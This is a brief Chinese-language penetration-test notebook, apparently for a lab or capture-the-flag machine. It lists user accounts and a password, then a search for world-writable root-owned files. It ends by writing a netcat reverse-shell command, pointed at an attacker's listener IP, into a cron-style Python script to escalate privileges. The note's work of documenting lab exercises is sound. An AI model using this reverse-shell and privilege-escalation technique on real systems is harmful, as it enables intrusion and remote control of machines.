1.nmap扫描
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
P@55W0rd1!2@
逃逸成功
看看账号
find / -type f -user root -perm -o=w 2>/dev/null |grep -v “sys|proc”
找到tmp.py
echo “import os;os.system(‘/bin/nc -e /bin/bash 10.8.0.58 8888’)” >/opt/tmp.py
渗透完成